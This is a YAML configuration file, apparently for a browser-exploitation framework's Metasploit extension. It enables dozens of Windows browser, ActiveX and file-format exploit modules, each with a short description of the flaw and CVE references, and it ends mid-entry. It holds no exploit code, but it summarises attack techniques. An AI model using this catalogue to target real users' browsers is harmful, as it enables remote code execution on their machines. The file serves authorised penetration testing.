msf_creative_software_cachefolder:
enable: true
msf: true
msf_key: windows/browser/creative_software_cachefolder
name: Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When\n\
\t\t\t\tsending an overly long string to the cachefolder() property of CTSUEng.ocx\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0955
- - OSVDB
- "45655"
path: extensions/metasploit/
class: Msf_module
msf_webex_ucf_newobject:
enable: true
msf: true
msf_key: windows/browser/webex_ucf_newobject
name: WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in WebEx's WebexUCFObject\n\
\t\t\t\tActiveX Control. If a long string is passed to the 'NewObject' method, a stack-\n\
\t\t\t\tbased buffer overflow will occur when copying attacker-supplied data using the\n\
\t\t\t\tsprintf function.\n\n\
\t\t\t\tIt is noteworthy that this vulnerability was discovered and reported by multiple\n\
\t\t\t\tindependent researchers. To quote iDefense's advisory, \"Before this issue was\n\
\t\t\t\tpublicly reported, at least three independent security researchers had knowledge\n\
\t\t\t\tof this issue; thus, it is reasonable to believe that even more people were aware\n\
\t\t\t\tof this issue before disclosure.\"\n\n\
\t\t\t\tNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n\
\t\t\t\tinto memory unmodified.\n\
\t\t\t"
authors:
- - CVE
- 2008-3558
- - OSVDB
- "47344"
- - BID
- "30578"
- - URL
- http://www.exploit-db.com/exploits/6220
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849
- - URL
- http://www.trapkit.de/advisories/TKADV2008-009.txt
- - URL
- http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html
- - URL
- http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml
path: extensions/metasploit/
class: Msf_module
msf_winamp_playlist_unc:
enable: true
msf: true
msf_key: windows/browser/winamp_playlist_unc
name: Winamp Playlist UNC Path Computer Name Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Winamp media player.\n\
\t\t\t\tThis flaw is triggered when an audio file path is specified, inside a\n\
\t\t\t\tplaylist, that consists of a UNC path with a long computer name. This\n\
\t\t\t\tmodule delivers the playlist via the browser. This module has only\n\
\t\t\t\tbeen successfully tested on Winamp 5.11 and 5.12.\n\
\t\t\t"
authors:
- - CVE
- 2006-0476
- - OSVDB
- "22789"
- - BID
- "16410"
path: extensions/metasploit/
class: Msf_module
msf_real_arcade_installerdlg:
enable: true
msf: true
msf_key: windows/browser/real_arcade_installerdlg
name: Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Real Networks Arcade Games' ActiveX control. The \"exec\"\n\
\t\t\t\tfunction found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n\
\t\t\t\ton the victim machine.\n\
\t\t\t"
authors:
- - OSVDB
- "71559"
- - URL
- http://www.exploit-db.com/exploits/17105/
path: extensions/metasploit/
class: Msf_module
msf_apple_quicktime_marshaled_punk:
enable: true
msf: true
msf_key: windows/browser/apple_quicktime_marshaled_punk
name: Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory trust issue in Apple QuickTime\n\
\t\t\t\t7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX\n\
\t\t\t\tcontrol will treat a supplied parameter as a trusted pointer. It will\n\
\t\t\t\tthen use it as a COM-type pUnknown and lead to arbitrary code execution.\n\n\
\t\t\t\tThis exploit utilizes a combination of heap spraying and the\n\
\t\t\t\tQuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not\n\
\t\t\t\topt-in to ASLR. As such, this module should be reliable on all Windows\n\
\t\t\t\tversions.\n\n\
\t\t\t\tNOTE: The addresses may need to be adjusted for older versions of QuickTime.\n\
\t\t\t"
authors:
- - CVE
- 2010-1818
- - OSVDB
- "67705"
- - URL
- http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_executerequest:
enable: true
msf: true
msf_key: windows/browser/novelliprint_executerequest
name: Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 4.26. When\n\
\t\t\t\tsending an overly long string to the ExecuteRequest() property of ienipp.ocx\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0935
- - OSVDB
- "42063"
- - BID
- "27939"
path: extensions/metasploit/
class: Msf_module
msf_ms06_013_createtextrange:
enable: true
msf: true
msf_key: windows/browser/ms06_013_createtextrange
name: Internet Explorer createTextRange() Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft Internet Explorer.\n\
\t\t\t\tBoth IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way which, under\n\
\t\t\t\tcertain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point\n\
\t\t\t\tto a very remote, non-existent memory location. This module is the result of merging three\n\
\t\t\t\tdifferent exploit submissions and has only been reliably tested against Windows XP SP2.\n\
\t\t\t\tThis vulnerability was independently discovered by multiple parties. The heap spray method\n\
\t\t\t\tused by this exploit was pioneered by Skylined.\n\
\t\t\t"
authors:
- - CVE
- 2006-1359
- - OSVDB
- "24050"
- - MSB
- MS06-013
- - BID
- "17196"
- - US-CERT-VU
- "876678"
- - URL
- http://secunia.com/secunia_research/2006-7/advisory/
- - URL
- http://seclists.org/lists/bugtraq/2006/Mar/0410.html
- - URL
- http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html
- - URL
- http://www.shog9.com/crashIE.html
path: extensions/metasploit/
class: Msf_module
msf_ms06_001_wmf_setabortproc:
enable: true
msf: true
msf_key: windows/browser/ms06_001_wmf_setabortproc
name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the GDI library included with\n\
\t\t\t\tWindows XP and 2003. This vulnerability uses the 'Escape' metafile function\n\
\t\t\t\tto execute arbitrary code through the SetAbortProc procedure. This module\n\
\t\t\t\tgenerates a random WMF record stream for each request.\n\
\t\t\t"
authors:
- - CVE
- 2005-4560
- - OSVDB
- "21987"
- - MSB
- MS06-001
- - BID
- "16074"
- - URL
- http://www.microsoft.com/technet/security/advisory/912840.mspx
- - URL
- http://wvware.sourceforge.net/caolan/ora-wmf.html
- - URL
- http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt
path: extensions/metasploit/
class: Msf_module
msf_enjoysapgui_preparetoposthtml:
enable: true
msf: true
msf_key: windows/browser/enjoysapgui_preparetoposthtml
name: EnjoySAP SAP GUI ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SAP KWEdit ActiveX\n\
\t\t\t\tControl (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending\n\
\t\t\t\tan overly long string to the \"PrepareToPostHTML()\" method, an attacker\n\
\t\t\t\tmay be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3605
- - OSVDB
- "37690"
- - BID
- "24772"
path: extensions/metasploit/
class: Msf_module
msf_ms07_017_ani_loadimage_chunksize:
enable: true
msf: true
msf_key: windows/email/ms07_017_ani_loadimage_chunksize
name: Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow vulnerability in the\n\
\t\t\t\tLoadAniIcon() function of USER32.dll. The flaw is triggered\n\
\t\t\t\tthrough Outlook Express by using the CURSOR style sheet\n\
\t\t\t\tdirective to load a malicious .ANI file.\n\n\
\t\t\t\tThis vulnerability was discovered by Alexander Sotirov of Determina\n\
\t\t\t\tand was rediscovered, in the wild, by McAfee.\n\
\t\t\t"
authors:
- - MSB
- MS07-017
- - CVE
- 2007-0038
- - CVE
- 2007-1765
- - OSVDB
- "33629"
- - BID
- "23194"
- - URL
- http://www.microsoft.com/technet/security/advisory/935423.mspx
- - URL
- http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp
- - URL
- http://www.determina.com/security.research/vulnerabilities/ani-header.html
path: extensions/metasploit/
class: Msf_module
msf_adobe_cooltype_sing:
enable: true
msf: true
msf_key: windows/fileformat/adobe_cooltype_sing
name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table\n\
\t\t\t\thandling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n\
\t\t\t\tassumed to be vulnerable as well.\n\
\t\t\t"
authors:
- - CVE
- 2010-2883
- - OSVDB
- "67849"
- - URL
- http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
- - URL
- http://www.adobe.com/support/security/advisories/apsa10-02.html
path: extensions/metasploit/
class: Msf_module
msf_nis2004_antispam:
enable: true
msf: true
msf_key: windows/browser/nis2004_antispam
name: Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Norton AntiSpam 2004. When\n\
\t\t\t\tsending an overly long string to the LaunchCustomRuleWizard() method\n\
\t\t\t\tof symspam.dll (2004.1.0.147) an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2004-0363
- - OSVDB
- "6249"
- - BID
- "9916"
path: extensions/metasploit/
class: Msf_module
msf_symantec_altirisdeployment_downloadandinstall:
enable: true
msf: true
msf_key: windows/browser/symantec_altirisdeployment_downloadandinstall
name: Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to install and execute arbitrary files on a user's file system via\n\
\t\t\t\tAeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.\n\
\t\t\t"
authors:
- - BID
- "36346"
- - CVE
- 2009-3028
- - OSVDB
- "57893"
path: extensions/metasploit/
class: Msf_module
msf_softartisans_getdrivename:
enable: true
msf: true
msf_key: windows/browser/softartisans_getdrivename
name: SoftArtisans XFile FileManager ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control\n\
\t\t\t\t(SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1682
- - OSVDB
- "47794"
- - US-CERT-VU
- "914785"
- - BID
- "30826"
path: extensions/metasploit/
class: Msf_module
msf_apple_quicktime_rtsp:
enable: true
msf: true
msf_key: windows/browser/apple_quicktime_rtsp
name: Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Apple QuickTime\n\
\t\t\t\t7.1.3. This module was inspired by MOAB-01-01-2007. The\n\
\t\t\t\tBrowser target for this module was tested against IE 6 and\n\
\t\t\t\tFirefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the\n\
\t\t\t\tQuickTime plugin.\n\
\t\t\t"
authors:
- - CVE
- 2007-0015
- - OSVDB
- "31023"
- - BID
- "21829"
- - URL
- http://projects.info-pull.com/moab/MOAB-01-01-2007.html
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_getdriversettings_2:
enable: true
msf: true
msf_key: windows/browser/novelliprint_getdriversettings_2
name: Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.52. When\n\
\t\t\t\tsending an overly long string to the GetDriverSettings() property of ienipp.ocx\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-4321
- - BID
- "44966"
- - OSVDB
- "69357"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-256/
- - URL
- http://www.exploit-db.com/exploits/16014/
- - URL
- http://www.novell.com/support/viewContent.do?externalId=7007234
path: extensions/metasploit/
class: Msf_module
msf_ca_brightstor_addcolumn:
enable: true
msf: true
msf_key: windows/browser/ca_brightstor_addcolumn
name: CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based\n\
\t\t\t\tbuffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker\n\
\t\t\t\tcould overflow a buffer and execute arbitrary code on the system.\n\
\t\t\t"
authors:
- - CVE
- 2008-1472
- - OSVDB
- "43214"
path: extensions/metasploit/
class: Msf_module
msf_symantec_consoleutilities_browseandsavefile:
enable: true
msf: true
msf_key: windows/browser/symantec_consoleutilities_browseandsavefile
name: Symantec ConsoleUtilities ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Symantec's ConsoleUtilities.\n\
\t\t\t\tBy sending an overly long string to the \"BrowseAndSaveFile()\" method located\n\
\t\t\t\tin the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-3031
- - OSVDB
- "59597"
- - BID
- "36698"
- - URL
- http://sotiriu.de/adv/NSOADV-2009-001.txt
- - URL
- http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00
path: extensions/metasploit/
class: Msf_module
msf_yahoomessenger_fvcom:
enable: true
msf: true
msf_key: windows/browser/yahoomessenger_fvcom
name: Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX\n\
\t\t\t\tControl (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string\n\
\t\t\t\tto the \"fvCom()\" method from a yahoo.com domain, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4515
- - OSVDB
- "37739"
- - BID
- "25494"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591
path: extensions/metasploit/
class: Msf_module
msf_aol_ampx_convertfile:
enable: true
msf: true
msf_key: windows/browser/aol_ampx_convertfile
name: AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in AOL IWinAmpActiveX\n\
\t\t\t\tclass (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.\n\
\t\t\t\tBy setting an overly long value to 'ConvertFile()', an attacker can overrun\n\
\t\t\t\ta buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "54706"
- - BID
- "35028"
- - URL
- http://www.milw0rm.com/exploits/8733
path: extensions/metasploit/
class: Msf_module
msf_adobe_utilprintf:
enable: true
msf: true
msf_key: windows/fileformat/adobe_utilprintf
name: Adobe util.printf() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n\
\t\t\t\t< 8.1.3. By creating a specially crafted pdf that contains a malformed util.printf()\n\
\t\t\t\tentry, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-2992
- - OSVDB
- "49520"
path: extensions/metasploit/
class: Msf_module
msf_macrovision_downloadandexecute:
enable: true
msf: true
msf_key: windows/browser/macrovision_downloadandexecute
name: Macrovision InstallShield Update Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Macrovision InstallShield Update\n\
\t\t\t\tService (Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to\n\
\t\t\t\tthe DownloadAndExecute method, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5660
- - OSVDB
- "38347"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059288.html
path: extensions/metasploit/
class: Msf_module
msf_webdav_dll_hijacker:
enable: true
msf: true
msf_key: windows/browser/webdav_dll_hijacker
name: WebDAV Application DLL Hijacker
category: Metasploit
description: "\n\
\t\t\t\tThis module presents a directory of file extensions that can lead to\n\
\t\t\tcode execution when opened from the share. The default EXTENSIONS option\n\
\t\t\tmust be configured to specify a vulnerable application type.\n\
\t\t\t"
authors:
- - URL
- http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
- - URL
- http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt
path: extensions/metasploit/
class: Msf_module
msf_adobe_flatedecode_predictor02:
enable: true
msf: true
msf_key: windows/fileformat/adobe_flatedecode_predictor02
name: Adobe FlateDecode Stream Predictor 02 Integer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n\
\t\t\t\tAcrobat Professional versions before 9.2.\n\
\t\t\t"
authors:
- - CVE
- 2009-3459
- - BID
- "36600"
- - OSVDB
- "58729"
- - URL
- http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html
- - URL
- http://www.adobe.com/support/security/bulletins/apsb09-15.html
- - URL
- http://www.fortiguard.com/analysis/pdfanalysis.html
path: extensions/metasploit/
class: Msf_module
msf_winamp_ultravox:
enable: true
msf: true
msf_key: windows/browser/winamp_ultravox
name: Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Winamp 5.24. By\n\
\t\t\t\tsending an overly long artist tag, a remote attacker may\n\
\t\t\t\tbe able to execute arbitrary code. This vulnerability can be\n\
\t\t\t\texploited from the browser or the Winamp client itself.\n\
\t\t\t"
authors:
- - CVE
- 2008-0065
- - OSVDB
- "41707"
- - BID
- "27344"
path: extensions/metasploit/
class: Msf_module
msf_baofeng_storm_onbeforevideodownload:
enable: true
msf: true
msf_key: windows/browser/baofeng_storm_onbeforevideodownload
name: BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in BaoFeng's Storm Media Player ActiveX\n\
\t\t\t\tcontrol. Versions of mps.dll including 3.9.4.27 and lower are affected. When passing\n\
\t\t\t\tan overly long string to the method \"OnBeforeVideoDownload\" an attacker can execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-1612
- - OSVDB
- "54169"
- - BID
- "34789"
- - URL
- http://www.exploit-db.com/exploits/8579
path: extensions/metasploit/
class: Msf_module
msf_adobe_media_newplayer:
enable: true
msf: true
msf_key: windows/fileformat/adobe_media_newplayer
name: Adobe Doc.media.newPlayer Use After Free Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n\
\t\t\t\tProfessional versions up to and including 9.2.\n\
\t\t\t"
authors:
- - CVE
- 2009-4324
- - BID
- "37331"
- - OSVDB
- "60980"
path: extensions/metasploit/
class: Msf_module
msf_oracle_dc_submittoexpress:
enable: true
msf: true
msf_key: windows/browser/oracle_dc_submittoexpress
name: Oracle Document Capture 10g ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n\
\t\t\t\tOracle Document Capture 10g comes bundled with a third party ActiveX control\n\
\t\t\t\temsmtp.dll (6.0.1.0). When passing an overly long string to the method \"SubmitToExpress\"\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4607
- - OSVDB
- "38335"
- - BID
- "25467"
- - US-CERT-VU
- "281977"
path: extensions/metasploit/
class: Msf_module
msf_ms08_070_visual_studio_msmask:
enable: true
msf: true
msf_key: windows/browser/ms08_070_visual_studio_msmask
name: Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.\n\
\t\t\t\tWhen passing a specially crafted string to the Mask parameter of the\n\
\t\t\t\tMsmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2008-3704
- - OSVDB
- "47475"
- - BID
- "30674"
- - MSB
- MS08-070
path: extensions/metasploit/
class: Msf_module
msf_macrovision_unsafe:
enable: true
msf: true
msf_key: windows/browser/macrovision_unsafe
name: Macrovision InstallShield Update Service ActiveX Unsafe Method
category: Metasploit
description: "\n\
\t\t\t\tThis module allows attackers to execute code via an unsafe method in Macrovision InstallShield 2008.\n\
\t\t\t"
authors:
- - CVE
- 2007-5660
- - OSVDB
- "38347"
- - BID
- "26280"
path: extensions/metasploit/
class: Msf_module
msf_nctaudiofile2_setformatlikesample:
enable: true
msf: true
msf_key: windows/browser/nctaudiofile2_setformatlikesample
name: NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX\n\
\t\t\t\tControl provided by various audio applications. By sending an overly long\n\
\t\t\t\tstring to the \"SetFormatLikeSample()\" method, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-0018
- - OSVDB
- "32032"
- - BID
- "22196"
- - US-CERT-VU
- "292713"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/062911.html
path: extensions/metasploit/
class: Msf_module
msf_ms10_022_ie_vbscript_winhlp32:
enable: true
msf: true
msf_key: windows/browser/ms10_022_ie_vbscript_winhlp32
name: Internet Explorer Winhlp32.exe MsgBox Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability that occurs when a user\n\
\t\t\t\tpresses F1 on a MessageBox originating from VBScript within a web page. When the\n\
\t\t\t\tuser hits F1, the MessageBox help functionality will attempt to load and use\n\
\t\t\t\tan HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.\n\n\
\t\t\t\tThis particular version of the exploit implements a WebDAV server that will\n\
\t\t\t\tserve the HLP file as well as a payload EXE. During testing warnings about the\n\
\t\t\t\tpayload EXE being unsigned were witnessed. A future version of this module\n\
\t\t\t\tmight use other methods that do not create such a warning.\n\
\t\t\t"
authors:
- - CVE
- 2010-0483
- - OSVDB
- "62632"
- - MSB
- MS10-023
- - URL
- http://www.microsoft.com/technet/security/advisory/981169.mspx
- - URL
- http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx
- - URL
- http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt
path: extensions/metasploit/
class: Msf_module
msf_sapgui_saveviewtosessionfile:
enable: true
msf: true
msf_key: windows/browser/sapgui_saveviewtosessionfile
name: SAP AG SAPgui EAI WebViewer3D Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Siemens Unigraphics Solutions\n\
\t\t\t\tTeamcenter Visualization EAI WebViewer3D ActiveX control that is bundled\n\
\t\t\t\twith SAPgui. When passing an overly long string to the SaveViewToSessionFile()\n\
\t\t\t\tmethod, arbitrary code may be executed.\n\
\t\t\t"
authors:
- - CVE
- 2007-4475
- - OSVDB
- "53066"
- - US-CERT-VU
- "985449"
path: extensions/metasploit/
class: Msf_module
msf_lpviewer_url:
enable: true
msf: true
msf_key: windows/browser/lpviewer_url
name: iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n\
\t\t\t\tsending an overly long string to the URL() property an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-4384
- - OSVDB
- "48946"
- - US-CERT-VU
- "848873"
- - BID
- "31604"
path: extensions/metasploit/
class: Msf_module
msf_amaya_bdo:
enable: true
msf: true
msf_key: windows/browser/amaya_bdo
name: Amaya Browser v11.0 bdo tag overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Amaya v11 Browser.\n\
\t\t\t\t\tBy sending an overly long string to the \"bdo\"\n\
\t\t\t\t\ttag, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0323
- - OSVDB
- "55721"
- - BID
- 33046, 33047
path: extensions/metasploit/
class: Msf_module
msf_xmplay_asx:
enable: true
msf: true
msf_key: windows/browser/xmplay_asx
name: XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in XMPlay 3.3.0.4.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error within\n\
\t\t\t\tthe parsing of playlists containing an overly long file name.\n\
\t\t\t\tThis module uses the ASX file format.\n\
\t\t\t"
authors:
- - CVE
- 2006-6063
- - OSVDB
- "30537"
- - BID
- "21206"
- - URL
- http://secunia.com/advisories/22999/
path: extensions/metasploit/
class: Msf_module
msf_java_basicservice_impl:
enable: true
msf: true
msf_key: windows/browser/java_basicservice_impl
name: Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit
category: Metasploit
description: "\n\
\t\t\tThis module exploits a vulnerability in Java Runtime Environment\n\
\t\t\tthat allows an attacker to escape the Java Sandbox. By injecting\n\
\t\t\ta parameter into a javaws call within the BasicServiceImpl class,\n\
\t\t\tthe default Java sandbox policy file can be overwritten.\n\
\t\t\tThe vulnerability affects version 6 prior to update 22.\n\n\
\t\t\tNOTE: Exploiting this vulnerability causes several sinister-looking\n\
\t\t\tpopup windows saying that Java is \"Downloading application.\"\n\
\t\t\t"
authors:
- - CVE
- 2010-3563
- - OSVDB
- "69043"
- - URL
- http://mk41ser.blogspot.com
path: extensions/metasploit/
class: Msf_module
msf_cisco_anyconnect_exec:
enable: true
msf: true
msf_key: windows/browser/cisco_anyconnect_exec
name: Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Cisco AnyConnect VPN client\n\
\t\t\t\tvpnweb.ocx ActiveX control. This control is typically used to install the\n\
\t\t\t\tVPN client. An attacker can set the 'url' property, which is where the control\n\
\t\t\t\ttries to locate the files needed to install the client.\n\n\
\t\t\t\t\tThe control tries to download two files from the site specified within the\n\
\t\t\t\t'url' property. One of these files will be stored in a temporary directory and\n\
\t\t\t\texecuted.\n\
\t\t\t\t\t"
authors:
- - CVE
- 2011-2039
- - OSVDB
- "72714"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909
- - URL
- http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml
path: extensions/metasploit/
class: Msf_module
msf_ie_iscomponentinstalled:
enable: true
msf: true
msf_key: windows/browser/ie_iscomponentinstalled
name: Internet Explorer isComponentInstalled Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Internet Explorer. This bug was\n\
\t\t\t\tpatched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.\n\
\t\t\t"
authors:
- - CVE
- 2006-1016
- - OSVDB
- "31647"
- - BID
- "16870"
path: extensions/metasploit/
class: Msf_module
msf_athocgov_completeinstallation:
enable: true
msf: true
msf_key: windows/browser/athocgov_completeinstallation
name: AtHocGov IWSAlerts ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in AtHocGov IWSAlerts. When\n\
\t\t\t\tsending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll\n\
\t\t\t\t(6.1.4.36) an attacker may be able to execute arbitrary code. This\n\
\t\t\t\tvulnerability was silently patched by the vendor.\n\
\t\t\t"
authors:
- - URL
- http://www.athoc.com/products/IWSAlerts_overview.aspx
path: extensions/metasploit/
class: Msf_module
msf_mirc_irc_url:
enable: true
msf: true
msf_key: windows/browser/mirc_irc_url
name: mIRC IRC URL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in mIRC 6.1. By\n\
\t\t\t\tsubmitting an overly long and specially crafted URL to\n\
\t\t\t\tthe 'irc' protocol, an attacker can overwrite the buffer\n\
\t\t\t\tand control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2003-1336
- - OSVDB
- "2665"
- - BID
- "8819"
path: extensions/metasploit/
class: Msf_module
msf_symantec_backupexec_pvcalendar:
enable: true
msf: true
msf_key: windows/browser/symantec_backupexec_pvcalendar
name: Symantec BackupExec Calendar Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.\n\
\t\t\t\tBy sending an overly long string to the \"_DOWText0\" property located\n\
